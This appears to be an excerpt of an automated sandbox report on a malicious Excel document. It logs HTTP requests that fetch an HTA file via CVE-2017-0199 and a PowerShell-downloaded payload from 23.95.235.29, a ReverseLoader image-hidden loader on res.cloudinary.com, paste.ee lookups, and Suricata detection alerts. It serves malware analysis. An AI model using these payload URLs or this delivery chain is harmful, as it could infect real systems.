        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 23.95.235.29:80
        Source: global trafficTCP traffic: 23.95.235.29:80 -> 192.168.2.22:49165

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 23.95.235.29:80
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 23.95.235.29:80 -> 192.168.2.22:49162
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 23.95.235.29:80 -> 192.168.2.22:49164
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.22:49167
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.65.137:443 -> 192.168.2.22:49172
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: paste.ee
        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 23.95.235.29 23.95.235.29
        Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 23.95.235.29:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 23.95.235.29:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 23.95.235.29:80
        Source: global trafficHTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8897-Connection: Keep-AliveHost: 23.95.235.29If-Range: "14266-6290d7647e9e9"
        Source: global trafficHTTP traffic detected: GET /90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Thu, 12 Dec 2024 07:14:16 GMTConnection: Keep-AliveHost: 23.95.235.29If-None-Match: "14266-6290d7647e9e9"
        Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49167 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 151.101.65.137:443 -> 192.168.2.22:49172 version: TLS 1.0
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.29
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899C7018 URLDownloadToFileW,7_2_000007FE899C7018
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48E2187C.emfJump to behavior
        Source: global trafficHTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /94W72u?&deficit=exultant&breath=willing&analyst=luxuriant&plot=ethereal&eggplant=green&tea HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: jktc.proConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8897-Connection: Keep-AliveHost: 23.95.235.29If-Range: "14266-6290d7647e9e9"
        Source: global trafficHTTP traffic detected: GET /90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 23.95.235.29Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Thu, 12 Dec 2024 07:14:16 GMTConnection: Keep-AliveHost: 23.95.235.29If-None-Match: "14266-6290d7647e9e9"
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: global trafficDNS traffic detected: DNS query: jktc.pro
        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
        Source: global trafficDNS traffic detected: DNS query: paste.ee
        Source: mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/
        Source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/veryniceb
        Source: powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.501446236.000000001AD84000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494069922.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIF
        Source: powershell.exe, 00000007.00000002.465103812.000000001A950000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.501446236.000000001AD84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFC:
        Source: powershell.exe, 00000007.00000002.457796037.0000000000441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFY
        Source: powershell.exe, 00000013.00000002.494069922.000000000041F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll
        Source: powershell.exe, 00000007.00000002.457796037.0000000000441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFm.dll-
        Source: powershell.exe, 00000007.00000002.458485050.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.494624441.00000000025A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/verynicebeautifulpictueforentirelifekidsgivenmebackwithnew.tIFp
        Source: mshta.exe, 00000004.00000003.436483754.000000000257D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.439110454.000000000257E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.437054940.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440382828.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.483432299.0000000002E8D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.483622600.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482602942.0000000003E61000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
        Source: mshta.exe, 00000004.00000003.434479190.000000000044E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...
        Source: mshta.exe, 00000004.00000003.434479190.000000000044E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...s
        Source: mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta...un
        Source: mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaC:
        Source: mshta.exe, 00000004.00000003.436483754.0000000002575000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482272011.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.486809620.0000000002E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htahttp:/
        Source: mshta.exe, 00000004.00000002.440382828.000000000044E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.000000000031F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.000000000031E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.00000000002CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htant=gre
        Source: mshta.exe, 00000004.00000003.434479190.00000000004B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.488436254.0000000000331000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487377739.0000000000331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/90/wcc/greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htareen&t
        Source: mshta.exe, 0000000F.00000003.487428731.0000000003E4C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/L9a2M
        Source: mshta.exe, 00000004.00000002.440480058.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435988921.0000000002C18000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002C18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.95.235.29/o
        Source: mshta.exe, 00000004.00000003.435988921.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.440480058.0000000002BD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.435556244.0000000002BCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.465465325.000000001C3C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.490239809.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.487428731.0000000003E03000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.482734018.0000000003E02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
